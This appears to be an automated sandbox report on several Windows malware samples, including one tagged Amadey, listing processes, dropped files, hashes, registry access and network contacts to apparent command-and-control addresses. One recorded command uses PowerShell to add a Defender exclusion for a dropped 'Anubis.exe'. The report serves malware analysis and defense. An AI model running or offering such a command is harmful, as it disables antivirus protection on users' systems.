| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
"C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\fJzVdpCC\Anubis.exe""
Network
| Country | Destination | Domain | Proto |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
Files
memory/1728-0-0x000007FEF5DF3000-0x000007FEF5DF4000-memory.dmp
memory/1728-1-0x00000000001E0000-0x00000000001F2000-memory.dmp
memory/1728-2-0x0000000000280000-0x0000000000290000-memory.dmp
memory/1728-3-0x000007FEF5DF0000-0x000007FEF67DC000-memory.dmp
memory/1728-4-0x000007FEF5DF3000-0x000007FEF5DF4000-memory.dmp
memory/1728-5-0x000007FEF5DF0000-0x000007FEF67DC000-memory.dmp
memory/2580-13-0x000007FEEE4AE000-0x000007FEEE4AF000-memory.dmp
memory/2580-14-0x000000001B740000-0x000000001BA22000-memory.dmp
memory/2580-15-0x0000000002340000-0x0000000002348000-memory.dmp
memory/2580-16-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
memory/2580-18-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
memory/2580-19-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
memory/2580-17-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
memory/2580-20-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
memory/2580-21-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Amadey
Amadey family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
"C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
Files
memory/2168-1-0x0000000000210000-0x0000000000211000-memory.dmp
\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
Analysis: behavioral3
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe |
| PID 2428 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe |
| PID 2428 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
"C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Network
Files
\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe
| MD5 | 0eb68c59eac29b84f81ad6522d396f59 |
| SHA1 | aacfdf3cb1bdd995f63584f31526b11874fc76a5 |
| SHA256 | dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f |
| SHA512 | 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
memory/2784-66-0x000000013F480000-0x0000000140ACB000-memory.dmp
memory/2428-67-0x000000013F810000-0x00000001403B1000-memory.dmp
memory/2428-128-0x000000013F810000-0x00000001403B1000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
140s
Max time network
139s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe | N/A |
Loads dropped DLL
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1172 wrote to memory of 4520 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe |
| PID 1172 wrote to memory of 4520 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
"C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe
| MD5 | 0eb68c59eac29b84f81ad6522d396f59 |
| SHA1 | aacfdf3cb1bdd995f63584f31526b11874fc76a5 |
| SHA256 | dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f |
| SHA512 | 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\vcruntime140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll
| MD5 | 4ff168aaa6a1d68e7957175c8513f3a2 |
| SHA1 | 782f886709febc8c7cebcec4d92c66c4d5dbcf57 |
| SHA256 | 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950 |
| SHA512 | c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\libcrypto-3.dll
| MD5 | 123ad0908c76ccba4789c084f7a6b8d0 |
| SHA1 | 86de58289c8200ed8c1fc51d5f00e38e32c1aad5 |
| SHA256 | 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43 |
| SHA512 | 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd
| MD5 | a25bc2b21b555293554d7f611eaa75ea |
| SHA1 | a0dfd4fcfae5b94d4471357f60569b0c18b30c17 |
| SHA256 | 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d |
| SHA512 | b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\zstandard\backend_c.pyd
| MD5 | 0fc69d380fadbd787403e03a1539a24a |
| SHA1 | 77f067f6d50f1ec97dfed6fae31a9b801632ef17 |
| SHA256 | 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc |
| SHA512 | e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\vcruntime140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_wmi.pyd
| MD5 | 827615eee937880862e2f26548b91e83 |
| SHA1 | 186346b816a9de1ba69e51042faf36f47d768b6c |
| SHA256 | 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32 |
| SHA512 | 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
| MD5 | 30f396f8411274f15ac85b14b7b3cd3d |
| SHA1 | d3921f39e193d89aa93c2677cbfb47bc1ede949c |
| SHA256 | cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f |
| SHA512 | 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd
| MD5 | 9e94fac072a14ca9ed3f20292169e5b2 |
| SHA1 | 1eeac19715ea32a65641d82a380b9fa624e3cf0d |
| SHA256 | a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f |
| SHA512 | b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd
| MD5 | 71d96f1dbfcd6f767d81f8254e572751 |
| SHA1 | e70b74430500ed5117547e0cd339d6e6f4613503 |
| SHA256 | 611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af |
| SHA512 | 7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd
| MD5 | d8f690eae02332a6898e9c8b983c56dd |
| SHA1 | 112c1fe25e0d948f767e02f291801c0e4ae592f0 |
| SHA256 | c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9 |
| SHA512 | e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\unicodedata.pyd
| MD5 | a8ed52a66731e78b89d3c6c6889c485d |
| SHA1 | 781e5275695ace4a5c3ad4f2874b5e375b521638 |
| SHA256 | bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7 |
| SHA512 | 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\win32api.pyd
| MD5 | e9d8ab0e7867f5e0d40bd474a5ca288c |
| SHA1 | e7bdf1664099c069ceea18c2922a8db049b4399a |
| SHA256 | df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487 |
| SHA512 | 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Cipher\_raw_ecb.pyd
| MD5 | 80bb1e0e06acaf03a0b1d4ef30d14be7 |
| SHA1 | b20cac0d2f3cd803d98a2e8a25fbf65884b0b619 |
| SHA256 | 5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6 |
| SHA512 | 2a13ab6715b818ad62267ab51e55cd54714aebf21ec9ea61c2aefd56017dc84a6b360d024f8682a2e105582b9c5fe892ecebd2bef8a492279b19ffd84bc83fa5 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Util\_strxor.pyd
| MD5 | f24f9356a6bdd29b9ef67509a8bc3a96 |
| SHA1 | a26946e938304b4e993872c6721eb8cc1dcbe43b |
| SHA256 | 034bb8efe3068763d32c404c178bd88099192c707a36f5351f7fdb63249c7f81 |
| SHA512 | c4d3f92d7558be1a714388c72f5992165dd7a9e1b4fa83b882536030542d93fdad9148c981f76fff7868192b301ac9256edb8c3d5ce5a1a2acac183f96c1028b |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Hash\_SHA256.pyd
| MD5 | cde035b8ab3d046b1ce37eee7ee91fa0 |
| SHA1 | 4298b62ed67c8d4f731d1b33e68d7dc9a58487ff |
| SHA256 | 16bea322d994a553b293a724b57293d57da62bc7eaf41f287956b306c13fd972 |
| SHA512 | c44fdee5a210459ce4557351e56b2d357fd4937f8ec8eaceab842fee29761f66c2262fcbaac837f39c859c67fa0e23d13e0f60b3ae59be29eb9d8abab0a572bb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Hash\_BLAKE2s.pyd
| MD5 | d54feb9a270b212b0ccb1937c660678a |
| SHA1 | 224259e5b684c7ac8d79464e51503d302390c5c9 |
| SHA256 | 032b83f1003a796465255d9b246050a196488bac1260f628913e536314afded4 |
| SHA512 | 29955a6569ca6d039b35bb40c56aeeb75fc765600525d0b469f72c97945970a428951bab4af9cd21b3161d5bba932f853778e2674ca83b14f7aba009fa53566f |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Hash\_SHA1.pyd
| MD5 | 556e6d0e5f8e4da74c2780481105d543 |
| SHA1 | 7a49cdef738e9fe9cd6cd62b0f74ead1a1774a33 |
| SHA256 | 247b0885cf83375211861f37b6dd1376aed5131d621ee0137a60fe7910e40f8b |
| SHA512 | 28fa0ce6bdbcc5e95b80aadc284c12658ef0c2be63421af5627776a55050ee0ea0345e30a15b744fc2b2f5b1b1bbb61e4881f27f6e3e863ebaaeed1073f4cda1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_ctr.pyd
| MD5 | c4c525b081f8a0927091178f5f2ee103 |
| SHA1 | a1f17b5ea430ade174d02ecc0b3cb79dbf619900 |
| SHA256 | 4d86a90b2e20cde099d6122c49a72bae081f60eb2eea0f76e740be6c41da6749 |
| SHA512 | 7c06e3e6261427bc6e654b2b53518c7eaa5f860a47ae8e80dc3f8f0fed91e122cb2d4632188dc44123fb759749b5425f426cd1153a8f84485ef0491002b26555 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_ofb.pyd
| MD5 | 19e0abf76b274c12ff624a16713f4999 |
| SHA1 | a4b370f556b925f7126bf87f70263d1705c3a0db |
| SHA256 | d9fda05ae16c5387ab46dc728c6edce6a3d0a9e1abdd7acb8b32fc2a17be6f13 |
| SHA512 | d03033ea5cf37641fbd802ebeb5019caef33c9a78e01519fea88f87e773dca92c80b74ba80429b530694dad0bfa3f043a7104234c7c961e18d48019d90277c8e |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_cfb.pyd
| MD5 | 899895c0ed6830c4c9a3328cc7df95b6 |
| SHA1 | c02f14ebda8b631195068266ba20e03210abeabc |
| SHA256 | 18d568c7be3e04f4e6026d12b09b1fa3fae50ff29ac3deaf861f3c181653e691 |
| SHA512 | 0b4c50e40af92bc9589668e13df417244274f46f5a66e1fc7d1d59bc281969ba319305becea119385f01cc4603439e4b37afa2cf90645425210848a02839e3e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 40390f2113dc2a9d6cfae7127f6ba329 |
| SHA1 | 9c886c33a20b3f76b37aa9b10a6954f3c8981772 |
| SHA256 | 6ba9c910f755885e4d356c798a4dd32d2803ea4cfabb3d56165b3017d0491ae2 |
| SHA512 | 617b963816838d649c212c5021d7d0c58839a85d4d33bbaf72c0ec6ecd98b609080e9e57af06fa558ff302660619be57cc974282826ab9f21ae0d80fbaa831a1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\pywintypes312.dll
| MD5 | da0e290ba30fe8cc1a44eeefcf090820 |
| SHA1 | d38fccd7d6f54aa73bd21f168289d7dce1a9d192 |
| SHA256 | 2d1d60b996d1d5c56c24313d97e0fcda41a8bd6bf0299f6ea4eb4a1e25d490b7 |
| SHA512 | bc031d61e5772c60cbac282d05f76d81af1aa2a29a8602c2efa05fc0ce1079390999336237560b408e6539a77c732f5066c1590b7feaedb24baa9371783f2a8f |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_ctypes.pyd
| MD5 | 5377ab365c86bbcdd998580a79be28b4 |
| SHA1 | b0a6342df76c4da5b1e28a036025e274be322b35 |
| SHA256 | 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93 |
| SHA512 | 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_queue.pyd
| MD5 | e1c6ff3c48d1ca755fb8a2ba700243b2 |
| SHA1 | 2f2d4c0f429b8a7144d65b179beab2d760396bfb |
| SHA256 | 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa |
| SHA512 | 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_ssl.pyd
| MD5 | 90f080c53a2b7e23a5efd5fd3806f352 |
| SHA1 | e3b339533bc906688b4d885bdc29626fbb9df2fe |
| SHA256 | fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4 |
| SHA512 | 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\select.pyd
| MD5 | 7c14c7bc02e47d5c8158383cb7e14124 |
| SHA1 | 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3 |
| SHA256 | 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5 |
| SHA512 | af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_socket.pyd
| MD5 | 69801d1a0809c52db984602ca2653541 |
| SHA1 | 0f6e77086f049a7c12880829de051dcbe3d66764 |
| SHA256 | 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3 |
| SHA512 | 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb |
memory/1172-126-0x00007FF765590000-0x00007FF766131000-memory.dmp
memory/4520-127-0x00007FF70B580000-0x00007FF70CBCB000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240729-en
Max time kernel
15s
Max time network
16s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
